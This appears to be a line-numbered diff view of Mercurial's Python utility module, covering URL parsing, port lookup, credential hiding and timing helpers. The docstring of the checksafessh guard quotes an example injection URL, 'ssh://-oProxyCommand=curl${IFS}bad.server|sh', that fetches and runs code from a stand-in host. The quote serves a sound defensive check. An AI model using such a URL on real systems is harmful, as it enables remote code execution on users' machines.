2777 a regular expression.
2777 a regular expression.
2778
2778
2779 fn is an optional function that will be applied to the replacement text
2779 fn is an optional function that will be applied to the replacement text
2780 just before replacement.
2780 just before replacement.
2781
2781
2782 escape_prefix is an optional flag that allows using doubled prefix for
2782 escape_prefix is an optional flag that allows using doubled prefix for
2783 its escaping.
2783 its escaping.
2784 """
2784 """
2785 fn = fn or (lambda s: s)
2785 fn = fn or (lambda s: s)
2786 patterns = '|'.join(mapping.keys())
2786 patterns = '|'.join(mapping.keys())
2787 if escape_prefix:
2787 if escape_prefix:
2788 patterns += '|' + prefix
2788 patterns += '|' + prefix
2789 if len(prefix) > 1:
2789 if len(prefix) > 1:
2790 prefix_char = prefix[1:]
2790 prefix_char = prefix[1:]
2791 else:
2791 else:
2792 prefix_char = prefix
2792 prefix_char = prefix
2793 mapping[prefix_char] = prefix_char
2793 mapping[prefix_char] = prefix_char
2794 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2794 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2795 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2795 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2796
2796
2797 def getport(port):
2797 def getport(port):
2798 """Return the port for a given network service.
2798 """Return the port for a given network service.
2799
2799
2800 If port is an integer, it's returned as is. If it's a string, it's
2800 If port is an integer, it's returned as is. If it's a string, it's
2801 looked up using socket.getservbyname(). If there's no matching
2801 looked up using socket.getservbyname(). If there's no matching
2802 service, error.Abort is raised.
2802 service, error.Abort is raised.
2803 """
2803 """
2804 try:
2804 try:
2805 return int(port)
2805 return int(port)
2806 except ValueError:
2806 except ValueError:
2807 pass
2807 pass
2808
2808
2809 try:
2809 try:
2810 return socket.getservbyname(pycompat.sysstr(port))
2810 return socket.getservbyname(pycompat.sysstr(port))
2811 except socket.error:
2811 except socket.error:
2812 raise Abort(_("no port number associated with service '%s'") % port)
2812 raise error.Abort(_("no port number associated with service '%s'")
2813 % port)
2813
2814
2814 class url(object):
2815 class url(object):
2815 r"""Reliable URL parser.
2816 r"""Reliable URL parser.
2816
2817
2817 This parses URLs and provides attributes for the following
2818 This parses URLs and provides attributes for the following
2818 components:
2819 components:
2819
2820
2820 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2821 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2821
2822
2822 Missing components are set to None. The only exception is
2823 Missing components are set to None. The only exception is
2823 fragment, which is set to '' if present but empty.
2824 fragment, which is set to '' if present but empty.
2824
2825
2825 If parsefragment is False, fragment is included in query. If
2826 If parsefragment is False, fragment is included in query. If
2826 parsequery is False, query is included in path. If both are
2827 parsequery is False, query is included in path. If both are
2827 False, both fragment and query are included in path.
2828 False, both fragment and query are included in path.
2828
2829
2829 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2830 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2830
2831
2831 Note that for backward compatibility reasons, bundle URLs do not
2832 Note that for backward compatibility reasons, bundle URLs do not
2832 take host names. That means 'bundle://../' has a path of '../'.
2833 take host names. That means 'bundle://../' has a path of '../'.
2833
2834
2834 Examples:
2835 Examples:
2835
2836
2836 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2837 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2837 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2838 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2838 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2839 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2839 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2840 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2840 >>> url(b'file:///home/joe/repo')
2841 >>> url(b'file:///home/joe/repo')
2841 <url scheme: 'file', path: '/home/joe/repo'>
2842 <url scheme: 'file', path: '/home/joe/repo'>
2842 >>> url(b'file:///c:/temp/foo/')
2843 >>> url(b'file:///c:/temp/foo/')
2843 <url scheme: 'file', path: 'c:/temp/foo/'>
2844 <url scheme: 'file', path: 'c:/temp/foo/'>
2844 >>> url(b'bundle:foo')
2845 >>> url(b'bundle:foo')
2845 <url scheme: 'bundle', path: 'foo'>
2846 <url scheme: 'bundle', path: 'foo'>
2846 >>> url(b'bundle://../foo')
2847 >>> url(b'bundle://../foo')
2847 <url scheme: 'bundle', path: '../foo'>
2848 <url scheme: 'bundle', path: '../foo'>
2848 >>> url(br'c:\foo\bar')
2849 >>> url(br'c:\foo\bar')
2849 <url path: 'c:\\foo\\bar'>
2850 <url path: 'c:\\foo\\bar'>
2850 >>> url(br'\\blah\blah\blah')
2851 >>> url(br'\\blah\blah\blah')
2851 <url path: '\\\\blah\\blah\\blah'>
2852 <url path: '\\\\blah\\blah\\blah'>
2852 >>> url(br'\\blah\blah\blah#baz')
2853 >>> url(br'\\blah\blah\blah#baz')
2853 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2854 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2854 >>> url(br'file:///C:\users\me')
2855 >>> url(br'file:///C:\users\me')
2855 <url scheme: 'file', path: 'C:\\users\\me'>
2856 <url scheme: 'file', path: 'C:\\users\\me'>
2856
2857
2857 Authentication credentials:
2858 Authentication credentials:
2858
2859
2859 >>> url(b'ssh://joe:xyz@x/repo')
2860 >>> url(b'ssh://joe:xyz@x/repo')
2860 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2861 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2861 >>> url(b'ssh://joe@x/repo')
2862 >>> url(b'ssh://joe@x/repo')
2862 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2863 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2863
2864
2864 Query strings and fragments:
2865 Query strings and fragments:
2865
2866
2866 >>> url(b'http://host/a?b#c')
2867 >>> url(b'http://host/a?b#c')
2867 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2868 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2868 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2869 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2869 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2870 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2870
2871
2871 Empty path:
2872 Empty path:
2872
2873
2873 >>> url(b'')
2874 >>> url(b'')
2874 <url path: ''>
2875 <url path: ''>
2875 >>> url(b'#a')
2876 >>> url(b'#a')
2876 <url path: '', fragment: 'a'>
2877 <url path: '', fragment: 'a'>
2877 >>> url(b'http://host/')
2878 >>> url(b'http://host/')
2878 <url scheme: 'http', host: 'host', path: ''>
2879 <url scheme: 'http', host: 'host', path: ''>
2879 >>> url(b'http://host/#a')
2880 >>> url(b'http://host/#a')
2880 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2881 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2881
2882
2882 Only scheme:
2883 Only scheme:
2883
2884
2884 >>> url(b'http:')
2885 >>> url(b'http:')
2885 <url scheme: 'http'>
2886 <url scheme: 'http'>
2886 """
2887 """
2887
2888
2888 _safechars = "!~*'()+"
2889 _safechars = "!~*'()+"
2889 _safepchars = "/!~*'()+:\\"
2890 _safepchars = "/!~*'()+:\\"
2890 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2891 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2891
2892
2892 def __init__(self, path, parsequery=True, parsefragment=True):
2893 def __init__(self, path, parsequery=True, parsefragment=True):
2893 # We slowly chomp away at path until we have only the path left
2894 # We slowly chomp away at path until we have only the path left
2894 self.scheme = self.user = self.passwd = self.host = None
2895 self.scheme = self.user = self.passwd = self.host = None
2895 self.port = self.path = self.query = self.fragment = None
2896 self.port = self.path = self.query = self.fragment = None
2896 self._localpath = True
2897 self._localpath = True
2897 self._hostport = ''
2898 self._hostport = ''
2898 self._origpath = path
2899 self._origpath = path
2899
2900
2900 if parsefragment and '#' in path:
2901 if parsefragment and '#' in path:
2901 path, self.fragment = path.split('#', 1)
2902 path, self.fragment = path.split('#', 1)
2902
2903
2903 # special case for Windows drive letters and UNC paths
2904 # special case for Windows drive letters and UNC paths
2904 if hasdriveletter(path) or path.startswith('\\\\'):
2905 if hasdriveletter(path) or path.startswith('\\\\'):
2905 self.path = path
2906 self.path = path
2906 return
2907 return
2907
2908
2908 # For compatibility reasons, we can't handle bundle paths as
2909 # For compatibility reasons, we can't handle bundle paths as
2909 # normal URLS
2910 # normal URLS
2910 if path.startswith('bundle:'):
2911 if path.startswith('bundle:'):
2911 self.scheme = 'bundle'
2912 self.scheme = 'bundle'
2912 path = path[7:]
2913 path = path[7:]
2913 if path.startswith('//'):
2914 if path.startswith('//'):
2914 path = path[2:]
2915 path = path[2:]
2915 self.path = path
2916 self.path = path
2916 return
2917 return
2917
2918
2918 if self._matchscheme(path):
2919 if self._matchscheme(path):
2919 parts = path.split(':', 1)
2920 parts = path.split(':', 1)
2920 if parts[0]:
2921 if parts[0]:
2921 self.scheme, path = parts
2922 self.scheme, path = parts
2922 self._localpath = False
2923 self._localpath = False
2923
2924
2924 if not path:
2925 if not path:
2925 path = None
2926 path = None
2926 if self._localpath:
2927 if self._localpath:
2927 self.path = ''
2928 self.path = ''
2928 return
2929 return
2929 else:
2930 else:
2930 if self._localpath:
2931 if self._localpath:
2931 self.path = path
2932 self.path = path
2932 return
2933 return
2933
2934
2934 if parsequery and '?' in path:
2935 if parsequery and '?' in path:
2935 path, self.query = path.split('?', 1)
2936 path, self.query = path.split('?', 1)
2936 if not path:
2937 if not path:
2937 path = None
2938 path = None
2938 if not self.query:
2939 if not self.query:
2939 self.query = None
2940 self.query = None
2940
2941
2941 # // is required to specify a host/authority
2942 # // is required to specify a host/authority
2942 if path and path.startswith('//'):
2943 if path and path.startswith('//'):
2943 parts = path[2:].split('/', 1)
2944 parts = path[2:].split('/', 1)
2944 if len(parts) > 1:
2945 if len(parts) > 1:
2945 self.host, path = parts
2946 self.host, path = parts
2946 else:
2947 else:
2947 self.host = parts[0]
2948 self.host = parts[0]
2948 path = None
2949 path = None
2949 if not self.host:
2950 if not self.host:
2950 self.host = None
2951 self.host = None
2951 # path of file:///d is /d
2952 # path of file:///d is /d
2952 # path of file:///d:/ is d:/, not /d:/
2953 # path of file:///d:/ is d:/, not /d:/
2953 if path and not hasdriveletter(path):
2954 if path and not hasdriveletter(path):
2954 path = '/' + path
2955 path = '/' + path
2955
2956
2956 if self.host and '@' in self.host:
2957 if self.host and '@' in self.host:
2957 self.user, self.host = self.host.rsplit('@', 1)
2958 self.user, self.host = self.host.rsplit('@', 1)
2958 if ':' in self.user:
2959 if ':' in self.user:
2959 self.user, self.passwd = self.user.split(':', 1)
2960 self.user, self.passwd = self.user.split(':', 1)
2960 if not self.host:
2961 if not self.host:
2961 self.host = None
2962 self.host = None
2962
2963
2963 # Don't split on colons in IPv6 addresses without ports
2964 # Don't split on colons in IPv6 addresses without ports
2964 if (self.host and ':' in self.host and
2965 if (self.host and ':' in self.host and
2965 not (self.host.startswith('[') and self.host.endswith(']'))):
2966 not (self.host.startswith('[') and self.host.endswith(']'))):
2966 self._hostport = self.host
2967 self._hostport = self.host
2967 self.host, self.port = self.host.rsplit(':', 1)
2968 self.host, self.port = self.host.rsplit(':', 1)
2968 if not self.host:
2969 if not self.host:
2969 self.host = None
2970 self.host = None
2970
2971
2971 if (self.host and self.scheme == 'file' and
2972 if (self.host and self.scheme == 'file' and
2972 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2973 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2973 raise Abort(_('file:// URLs can only refer to localhost'))
2974 raise error.Abort(_('file:// URLs can only refer to localhost'))
2974
2975
2975 self.path = path
2976 self.path = path
2976
2977
2977 # leave the query string escaped
2978 # leave the query string escaped
2978 for a in ('user', 'passwd', 'host', 'port',
2979 for a in ('user', 'passwd', 'host', 'port',
2979 'path', 'fragment'):
2980 'path', 'fragment'):
2980 v = getattr(self, a)
2981 v = getattr(self, a)
2981 if v is not None:
2982 if v is not None:
2982 setattr(self, a, urlreq.unquote(v))
2983 setattr(self, a, urlreq.unquote(v))
2983
2984
2984 @encoding.strmethod
2985 @encoding.strmethod
2985 def __repr__(self):
2986 def __repr__(self):
2986 attrs = []
2987 attrs = []
2987 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2988 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2988 'query', 'fragment'):
2989 'query', 'fragment'):
2989 v = getattr(self, a)
2990 v = getattr(self, a)
2990 if v is not None:
2991 if v is not None:
2991 attrs.append('%s: %r' % (a, v))
2992 attrs.append('%s: %r' % (a, v))
2992 return '<url %s>' % ', '.join(attrs)
2993 return '<url %s>' % ', '.join(attrs)
2993
2994
2994 def __bytes__(self):
2995 def __bytes__(self):
2995 r"""Join the URL's components back into a URL string.
2996 r"""Join the URL's components back into a URL string.
2996
2997
2997 Examples:
2998 Examples:
2998
2999
2999 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3000 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3000 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3001 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3001 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3002 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3002 'http://user:pw@host:80/?foo=bar&baz=42'
3003 'http://user:pw@host:80/?foo=bar&baz=42'
3003 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3004 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3004 'http://user:pw@host:80/?foo=bar%3dbaz'
3005 'http://user:pw@host:80/?foo=bar%3dbaz'
3005 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3006 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3006 'ssh://user:pw@[::1]:2200//home/joe#'
3007 'ssh://user:pw@[::1]:2200//home/joe#'
3007 >>> bytes(url(b'http://localhost:80//'))
3008 >>> bytes(url(b'http://localhost:80//'))
3008 'http://localhost:80//'
3009 'http://localhost:80//'
3009 >>> bytes(url(b'http://localhost:80/'))
3010 >>> bytes(url(b'http://localhost:80/'))
3010 'http://localhost:80/'
3011 'http://localhost:80/'
3011 >>> bytes(url(b'http://localhost:80'))
3012 >>> bytes(url(b'http://localhost:80'))
3012 'http://localhost:80/'
3013 'http://localhost:80/'
3013 >>> bytes(url(b'bundle:foo'))
3014 >>> bytes(url(b'bundle:foo'))
3014 'bundle:foo'
3015 'bundle:foo'
3015 >>> bytes(url(b'bundle://../foo'))
3016 >>> bytes(url(b'bundle://../foo'))
3016 'bundle:../foo'
3017 'bundle:../foo'
3017 >>> bytes(url(b'path'))
3018 >>> bytes(url(b'path'))
3018 'path'
3019 'path'
3019 >>> bytes(url(b'file:///tmp/foo/bar'))
3020 >>> bytes(url(b'file:///tmp/foo/bar'))
3020 'file:///tmp/foo/bar'
3021 'file:///tmp/foo/bar'
3021 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3022 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3022 'file:///c:/tmp/foo/bar'
3023 'file:///c:/tmp/foo/bar'
3023 >>> print(url(br'bundle:foo\bar'))
3024 >>> print(url(br'bundle:foo\bar'))
3024 bundle:foo\bar
3025 bundle:foo\bar
3025 >>> print(url(br'file:///D:\data\hg'))
3026 >>> print(url(br'file:///D:\data\hg'))
3026 file:///D:\data\hg
3027 file:///D:\data\hg
3027 """
3028 """
3028 if self._localpath:
3029 if self._localpath:
3029 s = self.path
3030 s = self.path
3030 if self.scheme == 'bundle':
3031 if self.scheme == 'bundle':
3031 s = 'bundle:' + s
3032 s = 'bundle:' + s
3032 if self.fragment:
3033 if self.fragment:
3033 s += '#' + self.fragment
3034 s += '#' + self.fragment
3034 return s
3035 return s
3035
3036
3036 s = self.scheme + ':'
3037 s = self.scheme + ':'
3037 if self.user or self.passwd or self.host:
3038 if self.user or self.passwd or self.host:
3038 s += '//'
3039 s += '//'
3039 elif self.scheme and (not self.path or self.path.startswith('/')
3040 elif self.scheme and (not self.path or self.path.startswith('/')
3040 or hasdriveletter(self.path)):
3041 or hasdriveletter(self.path)):
3041 s += '//'
3042 s += '//'
3042 if hasdriveletter(self.path):
3043 if hasdriveletter(self.path):
3043 s += '/'
3044 s += '/'
3044 if self.user:
3045 if self.user:
3045 s += urlreq.quote(self.user, safe=self._safechars)
3046 s += urlreq.quote(self.user, safe=self._safechars)
3046 if self.passwd:
3047 if self.passwd:
3047 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3048 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3048 if self.user or self.passwd:
3049 if self.user or self.passwd:
3049 s += '@'
3050 s += '@'
3050 if self.host:
3051 if self.host:
3051 if not (self.host.startswith('[') and self.host.endswith(']')):
3052 if not (self.host.startswith('[') and self.host.endswith(']')):
3052 s += urlreq.quote(self.host)
3053 s += urlreq.quote(self.host)
3053 else:
3054 else:
3054 s += self.host
3055 s += self.host
3055 if self.port:
3056 if self.port:
3056 s += ':' + urlreq.quote(self.port)
3057 s += ':' + urlreq.quote(self.port)
3057 if self.host:
3058 if self.host:
3058 s += '/'
3059 s += '/'
3059 if self.path:
3060 if self.path:
3060 # TODO: similar to the query string, we should not unescape the
3061 # TODO: similar to the query string, we should not unescape the
3061 # path when we store it, the path might contain '%2f' = '/',
3062 # path when we store it, the path might contain '%2f' = '/',
3062 # which we should *not* escape.
3063 # which we should *not* escape.
3063 s += urlreq.quote(self.path, safe=self._safepchars)
3064 s += urlreq.quote(self.path, safe=self._safepchars)
3064 if self.query:
3065 if self.query:
3065 # we store the query in escaped form.
3066 # we store the query in escaped form.
3066 s += '?' + self.query
3067 s += '?' + self.query
3067 if self.fragment is not None:
3068 if self.fragment is not None:
3068 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3069 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3069 return s
3070 return s
3070
3071
3071 __str__ = encoding.strmethod(__bytes__)
3072 __str__ = encoding.strmethod(__bytes__)
3072
3073
3073 def authinfo(self):
3074 def authinfo(self):
3074 user, passwd = self.user, self.passwd
3075 user, passwd = self.user, self.passwd
3075 try:
3076 try:
3076 self.user, self.passwd = None, None
3077 self.user, self.passwd = None, None
3077 s = bytes(self)
3078 s = bytes(self)
3078 finally:
3079 finally:
3079 self.user, self.passwd = user, passwd
3080 self.user, self.passwd = user, passwd
3080 if not self.user:
3081 if not self.user:
3081 return (s, None)
3082 return (s, None)
3082 # authinfo[1] is passed to urllib2 password manager, and its
3083 # authinfo[1] is passed to urllib2 password manager, and its
3083 # URIs must not contain credentials. The host is passed in the
3084 # URIs must not contain credentials. The host is passed in the
3084 # URIs list because Python < 2.4.3 uses only that to search for
3085 # URIs list because Python < 2.4.3 uses only that to search for
3085 # a password.
3086 # a password.
3086 return (s, (None, (s, self.host),
3087 return (s, (None, (s, self.host),
3087 self.user, self.passwd or ''))
3088 self.user, self.passwd or ''))
3088
3089
3089 def isabs(self):
3090 def isabs(self):
3090 if self.scheme and self.scheme != 'file':
3091 if self.scheme and self.scheme != 'file':
3091 return True # remote URL
3092 return True # remote URL
3092 if hasdriveletter(self.path):
3093 if hasdriveletter(self.path):
3093 return True # absolute for our purposes - can't be joined()
3094 return True # absolute for our purposes - can't be joined()
3094 if self.path.startswith(br'\\'):
3095 if self.path.startswith(br'\\'):
3095 return True # Windows UNC path
3096 return True # Windows UNC path
3096 if self.path.startswith('/'):
3097 if self.path.startswith('/'):
3097 return True # POSIX-style
3098 return True # POSIX-style
3098 return False
3099 return False
3099
3100
3100 def localpath(self):
3101 def localpath(self):
3101 if self.scheme == 'file' or self.scheme == 'bundle':
3102 if self.scheme == 'file' or self.scheme == 'bundle':
3102 path = self.path or '/'
3103 path = self.path or '/'
3103 # For Windows, we need to promote hosts containing drive
3104 # For Windows, we need to promote hosts containing drive
3104 # letters to paths with drive letters.
3105 # letters to paths with drive letters.
3105 if hasdriveletter(self._hostport):
3106 if hasdriveletter(self._hostport):
3106 path = self._hostport + '/' + self.path
3107 path = self._hostport + '/' + self.path
3107 elif (self.host is not None and self.path
3108 elif (self.host is not None and self.path
3108 and not hasdriveletter(path)):
3109 and not hasdriveletter(path)):
3109 path = '/' + path
3110 path = '/' + path
3110 return path
3111 return path
3111 return self._origpath
3112 return self._origpath
3112
3113
3113 def islocal(self):
3114 def islocal(self):
3114 '''whether localpath will return something that posixfile can open'''
3115 '''whether localpath will return something that posixfile can open'''
3115 return (not self.scheme or self.scheme == 'file'
3116 return (not self.scheme or self.scheme == 'file'
3116 or self.scheme == 'bundle')
3117 or self.scheme == 'bundle')
3117
3118
3118 def hasscheme(path):
3119 def hasscheme(path):
3119 return bool(url(path).scheme)
3120 return bool(url(path).scheme)
3120
3121
3121 def hasdriveletter(path):
3122 def hasdriveletter(path):
3122 return path and path[1:2] == ':' and path[0:1].isalpha()
3123 return path and path[1:2] == ':' and path[0:1].isalpha()
3123
3124
3124 def urllocalpath(path):
3125 def urllocalpath(path):
3125 return url(path, parsequery=False, parsefragment=False).localpath()
3126 return url(path, parsequery=False, parsefragment=False).localpath()
3126
3127
3127 def checksafessh(path):
3128 def checksafessh(path):
3128 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3129 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3129
3130
3130 This is a sanity check for ssh urls. ssh will parse the first item as
3131 This is a sanity check for ssh urls. ssh will parse the first item as
3131 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3132 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3132 Let's prevent these potentially exploited urls entirely and warn the
3133 Let's prevent these potentially exploited urls entirely and warn the
3133 user.
3134 user.
3134
3135
3135 Raises an error.Abort when the url is unsafe.
3136 Raises an error.Abort when the url is unsafe.
3136 """
3137 """
3137 path = urlreq.unquote(path)
3138 path = urlreq.unquote(path)
3138 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3139 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3139 raise error.Abort(_('potentially unsafe url: %r') %
3140 raise error.Abort(_('potentially unsafe url: %r') %
3140 (pycompat.bytestr(path),))
3141 (pycompat.bytestr(path),))
3141
3142
3142 def hidepassword(u):
3143 def hidepassword(u):
3143 '''hide user credential in a url string'''
3144 '''hide user credential in a url string'''
3144 u = url(u)
3145 u = url(u)
3145 if u.passwd:
3146 if u.passwd:
3146 u.passwd = '***'
3147 u.passwd = '***'
3147 return bytes(u)
3148 return bytes(u)
3148
3149
3149 def removeauth(u):
3150 def removeauth(u):
3150 '''remove all authentication information from a url string'''
3151 '''remove all authentication information from a url string'''
3151 u = url(u)
3152 u = url(u)
3152 u.user = u.passwd = None
3153 u.user = u.passwd = None
3153 return str(u)
3154 return str(u)
3154
3155
3155 timecount = unitcountfn(
3156 timecount = unitcountfn(
3156 (1, 1e3, _('%.0f s')),
3157 (1, 1e3, _('%.0f s')),
3157 (100, 1, _('%.1f s')),
3158 (100, 1, _('%.1f s')),
3158 (10, 1, _('%.2f s')),
3159 (10, 1, _('%.2f s')),
3159 (1, 1, _('%.3f s')),
3160 (1, 1, _('%.3f s')),
3160 (100, 0.001, _('%.1f ms')),
3161 (100, 0.001, _('%.1f ms')),
3161 (10, 0.001, _('%.2f ms')),
3162 (10, 0.001, _('%.2f ms')),
3162 (1, 0.001, _('%.3f ms')),
3163 (1, 0.001, _('%.3f ms')),
3163 (100, 0.000001, _('%.1f us')),
3164 (100, 0.000001, _('%.1f us')),
3164 (10, 0.000001, _('%.2f us')),
3165 (10, 0.000001, _('%.2f us')),
3165 (1, 0.000001, _('%.3f us')),
3166 (1, 0.000001, _('%.3f us')),
3166 (100, 0.000000001, _('%.1f ns')),
3167 (100, 0.000000001, _('%.1f ns')),
3167 (10, 0.000000001, _('%.2f ns')),
3168 (10, 0.000000001, _('%.2f ns')),
3168 (1, 0.000000001, _('%.3f ns')),
3169 (1, 0.000000001, _('%.3f ns')),
3169 )
3170 )
3170
3171
3171 _timenesting = [0]
3172 _timenesting = [0]
3172
3173
3173 def timed(func):
3174 def timed(func):
3174 '''Report the execution time of a function call to stderr.
3175 '''Report the execution time of a function call to stderr.
3175
3176
3176 During development, use as a decorator when you need to measure
3177 During development, use as a decorator when you need to measure
3177 the cost of a function, e.g. as follows:
3178 the cost of a function, e.g. as follows:
3178
3179
3179 @util.timed
3180 @util.timed
3180 def foo(a, b, c):
3181 def foo(a, b, c):
3181 pass
3182 pass
3182 '''
3183 '''
3183
3184
3184 def wrapper(*args, **kwargs):
3185 def wrapper(*args, **kwargs):
3185 start = timer()
3186 start = timer()
3186 indent = 2
3187 indent = 2
3187 _timenesting[0] += indent
3188 _timenesting[0] += indent
3188 try:
3189 try:
3189 return func(*args, **kwargs)
3190 return func(*args, **kwargs)
3190 finally:
3191 finally:
3191 elapsed = timer() - start
3192 elapsed = timer() - start
3192 _timenesting[0] -= indent
3193 _timenesting[0] -= indent
3193 stderr.write('%s%s: %s\n' %
3194 stderr.write('%s%s: %s\n' %
3194 (' ' * _timenesting[0], func.__name__,
3195 (' ' * _timenesting[0], func.__name__,
3195 timecount(elapsed)))
3196 timecount(elapsed)))
3196 return wrapper
3197 return wrapper
3197
3198
3198 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3199 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3199 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3200 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3200
3201
3201 def sizetoint(s):
3202 def sizetoint(s):
3202 '''Convert a space specifier to a byte count.
3203 '''Convert a space specifier to a byte count.
3203
3204
3204 >>> sizetoint(b'30')
3205 >>> sizetoint(b'30')
3205 30
3206 30
3206 >>> sizetoint(b'2.2kb')
3207 >>> sizetoint(b'2.2kb')
3207 2252
3208 2252
3208 >>> sizetoint(b'6M')
3209 >>> sizetoint(b'6M')
3209 6291456
3210 6291456
3210 '''
3211 '''
3211 t = s.strip().lower()
3212 t = s.strip().lower()
3212 try:
3213 try:
3213 for k, u in _sizeunits:
3214 for k, u in _sizeunits:
3214 if t.endswith(k):
3215 if t.endswith(k):
3215 return int(float(t[:-len(k)]) * u)
3216 return int(float(t[:-len(k)]) * u)
3216 return int(t)
3217 return int(t)
3217 except ValueError:
3218 except ValueError:
3218 raise error.ParseError(_("couldn't parse size: %s") % s)
3219 raise error.ParseError(_("couldn't parse size: %s") % s)
3219
3220
3220 class hooks(object):
3221 class hooks(object):
3221 '''A collection of hook functions that can be used to extend a
3222 '''A collection of hook functions that can be used to extend a
3222 function's behavior. Hooks are called in lexicographic order,
3223 function's behavior. Hooks are called in lexicographic order,
3223 based on the names of their sources.'''
3224 based on the names of their sources.'''
3224
3225
3225 def __init__(self):
3226 def __init__(self):
3226 self._hooks = []
3227 self._hooks = []
3227
3228
3228 def add(self, source, hook):
3229 def add(self, source, hook):
3229 self._hooks.append((source, hook))
3230 self._hooks.append((source, hook))
3230
3231
3231 def __call__(self, *args):
3232 def __call__(self, *args):
3232 self._hooks.sort(key=lambda x: x[0])
3233 self._hooks.sort(key=lambda x: x[0])
3233 results = []
3234 results = []
3234 for source, hook in self._hooks:
3235 for source, hook in self._hooks:
3235 results.append(hook(*args))
3236 results.append(hook(*args))
3236 return results
3237 return results
3237
3238
3238 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3239 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3239 '''Yields lines for a nicely formatted stacktrace.
3240 '''Yields lines for a nicely formatted stacktrace.
3240 Skips the 'skip' last entries, then return the last 'depth' entries.
3241 Skips the 'skip' last entries, then return the last 'depth' entries.
3241 Each file+linenumber is formatted according to fileline.
3242 Each file+linenumber is formatted according to fileline.
3242 Each line is formatted according to line.
3243 Each line is formatted according to line.
3243 If line is None, it yields:
3244 If line is None, it yields:
3244 length of longest filepath+line number,
3245 length of longest filepath+line number,
3245 filepath+linenumber,
3246 filepath+linenumber,
3246 function
3247 function
3247
3248
3248 Not be used in production code but very convenient while developing.
3249 Not be used in production code but very convenient while developing.
3249 '''
3250 '''
3250 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3251 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3251 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3252 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3252 ][-depth:]
3253 ][-depth:]
3253 if entries:
3254 if entries:
3254 fnmax = max(len(entry[0]) for entry in entries)
3255 fnmax = max(len(entry[0]) for entry in entries)
3255 for fnln, func in entries:
3256 for fnln, func in entries:
3256 if line is None:
3257 if line is None:
3257 yield (fnmax, fnln, func)
3258 yield (fnmax, fnln, func)
3258 else:
3259 else:
3259 yield line % (fnmax, fnln, func)
3260 yield line % (fnmax, fnln, func)
3260
3261
3261 def debugstacktrace(msg='stacktrace', skip=0,
3262 def debugstacktrace(msg='stacktrace', skip=0,
3262 f=stderr, otherf=stdout, depth=0):
3263 f=stderr, otherf=stdout, depth=0):
